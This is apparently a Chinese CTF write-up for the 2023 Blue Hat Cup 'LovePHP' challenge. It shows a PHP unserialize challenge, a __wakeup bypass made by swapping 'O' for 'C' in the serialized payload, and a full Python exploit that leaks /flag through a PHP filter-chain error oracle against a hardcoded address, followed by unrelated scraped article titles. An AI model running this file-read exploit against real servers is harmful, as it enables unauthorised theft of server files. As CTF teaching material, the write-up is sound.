2023 蓝帽杯CTF LovePHP

因为比赛已经结束,所以复现环境是从本地进行复现,这次比赛本来排名挺靠前的,原本总排名是60多名,赛区排名30多名,本来是以为有希望进入半决赛的,但是没想到比赛结束之后加上取证的分数后排名跌出了赛区前60,因为我们本身也缺少杂项方面的人,所以在取证方面只拿了100多分,也是挺遗憾的。

这篇文章主要写关于这次比赛,我对于反序列化__wakeup魔术方法绕过的认识

 <?php

class Saferman{

    public $check = True;

    public function __destruct(){

        if($this->check === True){

            file($_GET['secret']);

        }

    }

    public function __wakeup(){

        $this->check=False;

    }

}

if(isset($_GET['my_secret.flag'])){

    unserialize($_GET['my_secret.flag']);

}else{

    highlight_file(__FILE__);

}

代码如上面所示:可以看到代码其实很简单只需要绕过__wakeup魔术方法便可以了,但是这道题的php版本为7.4.33,所以如果使用 cve-2016-7124绕过的话是不可能的,所以这里的绕过方式是使用C绕过。

我们可以传入上面构造出来的payload然后将O改为C,便可以绕过__wakeup魔术方法

虽然有点报错,但是确实是绕过了__wakeup魔术方法。但是由于这道题刚好$check=true,所以是可以进行直接替换的,但是如果序列化后是需要传值的话,那么不能这样直接替换从而绕过__wakeup魔术方法。

可以看到这样直接替换后是没办法直接绕过__wakeup魔术方法的。

然后就是filterchain侧信道盲注攻击,脚本如下

import requests

import sys

from base64 import b64decode

"""

THE GRAND IDEA:

We can use PHP memory limit as an error oracle. Repeatedly applying the convert.iconv.L1.UCS-4LE

filter will blow up the string length by 4x every time it is used, which will quickly cause

500 error if and only if the string is non empty. So we now have an oracle that tells us if

the string is empty.

THE GRAND IDEA 2:

The dechunk filter is interesting.

https://github.com/php/php-src/blob/01b3fc03c30c6cb85038250bb5640be3a09c6a32/ext/standard/filters.c#L1724

It looks like it was implemented for something http related, but for our purposes, the interesting

behavior is that if the string contains no newlines, it will wipe the entire string if and only if

the string starts with A-Fa-f0-9, otherwise it will leave it untouched. This works perfect with our

above oracle! In fact we can verify that since the flag starts with D that the filter chain

dechunk|convert.iconv.L1.UCS-4LE|convert.iconv.L1.UCS-4LE|[...]|convert.iconv.L1.UCS-4LE

does not cause a 500 error.

THE REST:

So now we can verify if the first character is in A-Fa-f0-9. The rest of the challenge is a descent

into madness trying to figure out ways to:

- somehow get other characters not at the start of the flag file to the front

- detect more precisely which character is at the front

"""

def join(*x):

    return '|'.join(x)

def err(s):

    print(s)

    raise ValueError

def req(s):

    return requests.get('http://39.105.5.7:49227/?my[secret.flag=C:8:%22Saferman%22:0:{}&secret='+f'php://filter/{s}/resource=/flag').status_code == 500

blow_up_enc = join(*['convert.quoted-printable-encode']*1000)

blow_up_utf32 = 'convert.iconv.L1.UCS-4LE'

blow_up_inf = join(*[blow_up_utf32]*50)

header = 'convert.base64-encode|convert.base64-encode'

# Start get baseline blowup

print('Calculating blowup')

baseline_blowup = 0

for n in range(100):

    payload = join(*[blow_up_utf32]*n)

    if req(f'{header}|{payload}'):

        baseline_blowup = n

        break

else:

    err('something wrong')

print(f'baseline blowup is {baseline_blowup}')

trailer = join(*[blow_up_utf32]*(baseline_blowup-1))

assert req(f'{header}|{trailer}') == False

print('detecting equals')

j = [

    req(f'convert.base64-encode|convert.base64-encode|{blow_up_enc}|{trailer}'),

    req(f'convert.base64-encode|convert.iconv..CSISO2022KR|convert.base64-encode{blow_up_enc}|{trailer}'),

    req(f'convert.base64-encode|convert.iconv..CSISO2022KR|convert.iconv..CSISO2022KR|convert.base64-encode|{blow_up_enc}|{trailer}')

]

print(j)

if sum(j) != 2:

    err('something wrong')

if j[0] == False:

    header = f'convert.base64-encode|convert.iconv..CSISO2022KR|convert.base64-encode'

elif j[1] == False:

    header = f'convert.base64-encode|convert.iconv..CSISO2022KR|convert.iconv..CSISO2022KRconvert.base64-encode'

elif j[2] == False:

    header = f'convert.base64-encode|convert.base64-encode'

else:

    err('something wrong')

print(f'j: {j}')

print(f'header: {header}')

"""

Step two:

Now we have something of the form

[a-zA-Z0-9 things]==

Here the pain begins. For a long time I was trying to find something that would allow me to strip

successive characters from the start of the string to access every character. Maybe something like

that exists but I couldn't find it. However, if you play around with filter combinations you notice

there are filters that *swap* characters:

convert.iconv.CSUNICODE.UCS-2BE, which I call r2, flips every pair of characters in a string:

abcdefgh -> badcfehg

convert.iconv.UCS-4LE.10646-1:1993, which I call r4, reverses every chunk of four characters:

abcdefgh -> dcbahgfe

This allows us to access the first four characters of the string. Can we do better? It turns out

YES, we can! Turns out that convert.iconv.CSUNICODE.CSUNICODE appends <0xff><0xfe> to the start of

the string:

abcdefgh -> <0xff><0xfe>abcdefgh

The idea being that if we now use the r4 gadget, we get something like:

ba<0xfe><0xff>fedc

And then if we apply a convert.base64-decode|convert.base64-encode, it removes the invalid

<0xfe><0xff> to get:

bafedc

And then apply the r4 again, we have swapped the f and e to the front, which were the 5th and 6th

characters of the string. There's only one problem: our r4 gadget requires that the string length

is a multiple of 4. The original base64 string will be a multiple of four by definition, so when

we apply convert.iconv.CSUNICODE.CSUNICODE it will be two more than a multiple of four, which is no

good for our r4 gadget. This is where the double equals we required in step 1 comes in! Because it

turns out, if we apply the filter

convert.quoted-printable-encode|convert.quoted-printable-encode|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.L1.utf7

It will turn the == into:

+---AD0-3D3D+---AD0-3D3D

And this is magic, because this corrects such that when we apply the

convert.iconv.CSUNICODE.CSUNICODE filter the resuting string is exactly a multiple of four!

Let's recap. We have a string like:

abcdefghij==

Apply the convert.quoted-printable-encode + convert.iconv.L1.utf7:

abcdefghij+---AD0-3D3D+---AD0-3D3D

Apply convert.iconv.CSUNICODE.CSUNICODE:

<0xff><0xfe>abcdefghij+---AD0-3D3D+---AD0-3D3D

Apply r4 gadget:

ba<0xfe><0xff>fedcjihg---+-0DAD3D3---+-0DAD3D3

Apply base64-decode | base64-encode, so the '-' and high bytes will disappear:

bafedcjihg+0DAD3D3+0DAD3Dw==

Then apply r4 once more:

efabijcd0+gh3DAD0+3D3DAD==wD

And here's the cute part: not only have we now accessed the 5th and 6th chars of the string, but

the string still has two equals signs in it, so we can reapply the technique as many times as we

want, to access all the characters in the string ;)

"""

flip = "convert.quoted-printable-encode|convert.quoted-printable-encode|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.L1.utf7|convert.iconv.CSUNICODE.CSUNICODE|convert.iconv.UCS-4LE.10646-1:1993|convert.base64-decode|convert.base64-encode"

r2 = "convert.iconv.CSUNICODE.UCS-2BE"

r4 = "convert.iconv.UCS-4LE.10646-1:1993"

def get_nth(n):

    global flip, r2, r4

    o = []

    chunk = n // 2

    if chunk % 2 == 1: o.append(r4)

    o.extend([flip, r4] * (chunk // 2))

    if (n % 2 == 1) ^ (chunk % 2 == 1): o.append(r2)

    return join(*o)

"""

Step 3:

This is the longest but actually easiest part. We can use dechunk oracle to figure out if the first

char is 0-9A-Fa-f. So it's just a matter of finding filters which translate to or from those

chars. rot13 and string lower are helpful. There are probably a million ways to do this bit but

I just bruteforced every combination of iconv filters to find these.

Numbers are a bit trickier because iconv doesn't tend to touch them.

In the CTF you coud porbably just guess from there once you have the letters. But if you actually

want a full leak you can base64 encode a third time and use the first two letters of the resulting

string to figure out which number it is.

"""

rot1 = 'convert.iconv.437.CP930'

be = 'convert.quoted-printable-encode|convert.iconv..UTF7|convert.base64-decode|convert.base64-encode'

o = ''

def find_letter(prefix):

    if not req(f'{prefix}|dechunk|{blow_up_inf}'):

        # a-f A-F 0-9

        if not req(f'{prefix}|{rot1}|dechunk|{blow_up_inf}'):

            # a-e

            for n in range(5):

                if req(f'{prefix}|' + f'{rot1}|{be}|'*(n+1) + f'{rot1}|dechunk|{blow_up_inf}'):

                    return 'edcba'[n]

                    break

            else:

                err('something wrong')

        elif not req(f'{prefix}|string.tolower|{rot1}|dechunk|{blow_up_inf}'):

            # A-E

            for n in range(5):

                if req(f'{prefix}|string.tolower|' + f'{rot1}|{be}|'*(n+1) + f'{rot1}|dechunk|{blow_up_inf}'):

                    return 'EDCBA'[n]

                    break

            else:

                err('something wrong')

        elif not req(f'{prefix}|convert.iconv.CSISO5427CYRILLIC.855|dechunk|{blow_up_inf}'):

            return '*'

        elif not req(f'{prefix}|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):

            # f

            return 'f'

        elif not req(f'{prefix}|string.tolower|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):

            # F

            return 'F'

        else:

            err('something wrong')

    elif not req(f'{prefix}|string.rot13|dechunk|{blow_up_inf}'):

        # n-s N-S

        if not req(f'{prefix}|string.rot13|{rot1}|dechunk|{blow_up_inf}'):

            # n-r

            for n in range(5):

                if req(f'{prefix}|string.rot13|' + f'{rot1}|{be}|'*(n+1) + f'{rot1}|dechunk|{blow_up_inf}'):

                    return 'rqpon'[n]

                    break

            else:

                err('something wrong')

        elif not req(f'{prefix}|string.rot13|string.tolower|{rot1}|dechunk|{blow_up_inf}'):

            # N-R

            for n in range(5):

                if req(f'{prefix}|string.rot13|string.tolower|' + f'{rot1}|{be}|'*(n+1) + f'{rot1}|dechunk|{blow_up_inf}'):

                    return 'RQPON'[n]

                    break

            else:

                err('something wrong')

        elif not req(f'{prefix}|string.rot13|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):

            # s

            return 's'

        elif not req(f'{prefix}|string.rot13|string.tolower|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):

            # S

            return 'S'

        else:

            err('something wrong')

    elif not req(f'{prefix}|{rot1}|string.rot13|dechunk|{blow_up_inf}'):

        # i j k

        if req(f'{prefix}|{rot1}|string.rot13|{be}|{rot1}|dechunk|{blow_up_inf}'):

            return 'k'

        elif req(f'{prefix}|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):

            return 'j'

        elif req(f'{prefix}|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):

            return 'i'

        else:

            err('something wrong')

    elif not req(f'{prefix}|string.tolower|{rot1}|string.rot13|dechunk|{blow_up_inf}'):

        # I J K

        if req(f'{prefix}|string.tolower|{rot1}|string.rot13|{be}|{rot1}|dechunk|{blow_up_inf}'):

            return 'K'

        elif req(f'{prefix}|string.tolower|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):

            return 'J'

        elif req(f'{prefix}|string.tolower|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):

            return 'I'

        else:

            err('something wrong')

    elif not req(f'{prefix}|string.rot13|{rot1}|string.rot13|dechunk|{blow_up_inf}'):

        # v w x

        if req(f'{prefix}|string.rot13|{rot1}|string.rot13|{be}|{rot1}|dechunk|{blow_up_inf}'):

            return 'x'

        elif req(f'{prefix}|string.rot13|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):

            return 'w'

        elif req(f'{prefix}|string.rot13|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):

            return 'v'

        else:

            err('something wrong')

    elif not req(f'{prefix}|string.tolower|string.rot13|{rot1}|string.rot13|dechunk|{blow_up_inf}'):

        # V W X

        if req(f'{prefix}|string.tolower|string.rot13|{rot1}|string.rot13|{be}|{rot1}|dechunk|{blow_up_inf}'):

            return 'X'

        elif req(f'{prefix}|string.tolower|string.rot13|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):

            return 'W'

        elif req(f'{prefix}|string.tolower|string.rot13|{rot1}|string.rot13|{be}|{rot1}|{be}|{rot1}|{be}|{rot1}|dechunk|{blow_up_inf}'):

            return 'V'

        else:

            err('something wrong')

    elif not req(f'{prefix}|convert.iconv.CP285.CP280|string.rot13|dechunk|{blow_up_inf}'):

        # Z

        return 'Z'

    elif not req(f'{prefix}|string.toupper|convert.iconv.CP285.CP280|string.rot13|dechunk|{blow_up_inf}'):

        # z

        return 'z'

    elif not req(f'{prefix}|string.rot13|convert.iconv.CP285.CP280|string.rot13|dechunk|{blow_up_inf}'):

        # M

        return 'M'

    elif not req(f'{prefix}|string.rot13|string.toupper|convert.iconv.CP285.CP280|string.rot13|dechunk|{blow_up_inf}'):

        # m

        return 'm'

    elif not req(f'{prefix}|convert.iconv.CP273.CP1122|string.rot13|dechunk|{blow_up_inf}'):

        # y

        return 'y'

    elif not req(f'{prefix}|string.tolower|convert.iconv.CP273.CP1122|string.rot13|dechunk|{blow_up_inf}'):

        # Y

        return 'Y'

    elif not req(f'{prefix}|string.rot13|convert.iconv.CP273.CP1122|string.rot13|dechunk|{blow_up_inf}'):

        # l

        return 'l'

    elif not req(f'{prefix}|string.tolower|string.rot13|convert.iconv.CP273.CP1122|string.rot13|dechunk|{blow_up_inf}'):

        # L

        return 'L'

    elif not req(f'{prefix}|convert.iconv.500.1026|string.tolower|convert.iconv.437.CP930|string.rot13|dechunk|{blow_up_inf}'):

        # h

        return 'h'

    elif not req(f'{prefix}|string.tolower|convert.iconv.500.1026|string.tolower|convert.iconv.437.CP930|string.rot13|dechunk|{blow_up_inf}'):

        # H

        return 'H'

    elif not req(f'{prefix}|string.rot13|convert.iconv.500.1026|string.tolower|convert.iconv.437.CP930|string.rot13|dechunk|{blow_up_inf}'):

        # u

        return 'u'

    elif not req(f'{prefix}|string.rot13|string.tolower|convert.iconv.500.1026|string.tolower|convert.iconv.437.CP930|string.rot13|dechunk|{blow_up_inf}'):

        # U

        return 'U'

    elif not req(f'{prefix}|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):

        # g

        return 'g'

    elif not req(f'{prefix}|string.tolower|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):

        # G

        return 'G'

    elif not req(f'{prefix}|string.rot13|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):

        # t

        return 't'

    elif not req(f'{prefix}|string.rot13|string.tolower|convert.iconv.CP1390.CSIBM932|dechunk|{blow_up_inf}'):

        # T

        return 'T'

    else:

        err('something wrong')

print()

for i in range(100):

    prefix = f'{header}|{get_nth(i)}'

    letter = find_letter(prefix)

    # it's a number! check base64

    if letter == '*':

        prefix = f'{header}|{get_nth(i)}|convert.base64-encode'

        s = find_letter(prefix)

        if s == 'M':

            # 0 - 3

            prefix = f'{header}|{get_nth(i)}|convert.base64-encode|{r2}'

            ss = find_letter(prefix)

            if ss in 'CDEFGH':

                letter = '0'

            elif ss in 'STUVWX':

                letter = '1'

            elif ss in 'ijklmn':

                letter = '2'

            elif ss in 'yz*':

                letter = '3'

            else:

                err(f'bad num ({ss})')

        elif s == 'N':

            # 4 - 7

            prefix = f'{header}|{get_nth(i)}|convert.base64-encode|{r2}'

            ss = find_letter(prefix)

            if ss in 'CDEFGH':

                letter = '4'

            elif ss in 'STUVWX':

                letter = '5'

            elif ss in 'ijklmn':

                letter = '6'

            elif ss in 'yz*':

                letter = '7'

            else:

                err(f'bad num ({ss})')

        elif s == 'O':

            # 8 - 9

            prefix = f'{header}|{get_nth(i)}|convert.base64-encode|{r2}'

            ss = find_letter(prefix)

            if ss in 'CDEFGH':

                letter = '8'

            elif ss in 'STUVWX':

                letter = '9'

            else:

                err(f'bad num ({ss})')

        else:

            err('wtf')

    print(end=letter)

    o += letter

    sys.stdout.flush()

"""

We are done!! :)

"""

print()

d = b64decode(o.encode() + b'=' * 4)

# remove KR padding

d = d.replace(b'$)C',b'')

print(b64decode(d))

记一次weak_up函数绕过的更多相关文章

  1. 【CTF WEB】函数绕过

    函数绕过 <?php show_source(__FILE__); $c = "<?php exit;?>"; @$c.=$_GET['c']; @$filena ...

  2. char函数绕过魔术引号注入

    我目前学习到的绕过魔术引号的几种方法(如果知道还有别的请万望告之): 1.倘若服务端是GBK可以尝试宽字节注入 2.使用char函数绕过魔术引号进行注入 3.同char函数类似的函数,例如bin(转换 ...

  3. 内存保护机制及绕过方案——通过覆盖SEH异常处理函数绕过/GS机制

    通过SEH链绕过GS保护机制 ⑴.  原理分析: i.异常处理结构(SEH)处理流程如下: SEH是基于线程的,每一个线程都有一个独立的SEH处理结果,在线程信息块中的第一个结构指向线程的异常列表,F ...

  4. PHP中md5()函数绕过

    PHP md5()函数的简单绕过方法,该篇作为学习笔记简单记录一下.   例题   例题链接: http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php   ...

  5. python-笔记(四)函数

    一.函数是什么? 函数一次来源于数学,但是编程中的[函数]的概念,与数学中的函数还是有很大的不同的,编程中的函数在英文中也有很多不同的叫法. 在Basic中叫做subroutine(子过程或子程序), ...

  6. 记一个js toUpperCase函数 大小写特性

    toUpperCase()是javascript中小写变大写的函数 "ı".toUpperCase() == 'I',"ſ".toUpperCase() == ...

  7. ES6躬行记(14)——函数

    在前面的章节中,已陆陆续续介绍了ES6为改良函数而引入的几个新特性,本章将会继续讲解ES6对函数的其余改进,包括默认参数.元属性.块级函数和箭头函数等. 一.默认参数 在ES5时代,只能在函数体中定义 ...

  8. 随记MySQL的时间差函数(TIMESTAMPDIFF、DATEDIFF)、日期转换计算函数(date_add、day、date_format、str_to_date)

    时间差函数(TIMESTAMPDIFF.DATEDIFF) 需要用MySQL计算时间差,使用TIMESTAMPDIFF.DATEDIFF,记录一下实验结果 select datediff(now(), ...

  9. 记一次socket_create()函数耗时异常记录

    背景: 下午开发时突然整个页面耗时增加,空接口每次都需要2-3秒的耗时,一开始以为连开发环境数据库出现问题,最后断开数据库跑,发现还是很慢 最终逐步调试此页面耗时,定位到了socket_create( ...

  10. 记某次sql注入绕过ids

    昨天测试sql注入,发现个站,存在ids,一个单引号直接拦截,无论我怎么编码都不行,怕不是废了.. 灵机一动 基础探测 /*'*/ 报错 /*''*/ 返回正常 是字符串类型. 先本地测试 返回所有 ...

随机推荐

  1. ABP - 模块加载机制

    Abp是一个基于模块化开发的应用程序框架,提供了模块化基础的架构和模块化加载的引擎. 理解模块 一个模块是对一个功能点的封装,可以独立成为一个包,实现了松耦合的代码组织方式.Abp框架的基本思想就是模 ...

  2. 【工作随手记】并发之synchronized

    synchronized对于java同学肯定都是耳熟能详的必修课了.但是不管对于新手还是老手都有一些容易搞错的点.这里权做一点记录. 锁的是代码还是对象? 同步块一般有两种写法. 1是直接加以方法体上 ...

  3. 终极指南!Terraform的进阶技巧

    如果您已经对 Terraform 了如指掌,并期望自己的 IaC 技能有进一步提升的话,这篇文章很适合您!在本文中,我们将分享一些 Terraform 的高级使用技巧.从使用模块(module).工作 ...

  4. 一分钟学一个 Linux 命令 - mv 和 cp

    前言 大家好,我是god23bin.欢迎来到<一分钟学一个 Linux 命令>系列,今天需要你花两分钟时间来学习下,因为今天要讲的是两个命令,mv 和 cp 命令. mv 什么是 mv 命 ...

  5. bulkWrite探秘

    MongoDB有很多有趣的内置方法,其中为了批量处理一些写入操作,并且可以按照一定顺序执行,自从3.2版本之后提供了该批量方法:bulkWrite. 它的语法很简单: db.collection.bu ...

  6. 如何优化数据warehouse的搜索和查询

    目录 1. 引言 2. 技术原理及概念 2.1 基本概念解释 2.2 技术原理介绍 2.2.1 查询优化 2.2.2 索引优化 2.2.3 数据访问优化 2.3 相关技术比较 2.3.1 SQL 2. ...

  7. Serverless试飞员的夙愿 | 带您扶摇直上,酣畅淋漓的云上作战

    ​上期博文带您体验了外挂云函数Demo包,感受通过云函数使用云数据库快速突破"音障",进入"长机"云函数+"僚机"云数据库的Serverle ...

  8. C#中数组=out参数?

    - 结论 先上结论,答案是yes,C#中数组确实具有out参数的特性. - 疑问 最近开发一个上位机的功能,有段代码看得我一直很迷糊,我的认识,函数的执行结果,要么在函数中通过return返回,要么通 ...

  9. 一键搞定发布自己Jar到Maven中央仓库

    做java 开发那当然离不开jar包管理, 不知何时一直想想封装一个自己的jar包 然后发布到maven中央仓库给别人使用. hhh 我感觉自己写一个jar包工具然后,被很多人使用是一件很牛,很快乐事 ...

  10. UI自动化 --- UI Automation 基础详解

    引言 上一篇文章UI自动化 --- 微软UI Automation中,介绍了UI Automation能够做什么,且借助 Inspect.exe 工具完成了一个模拟点击操作的Demo,文章结尾也提出了 ...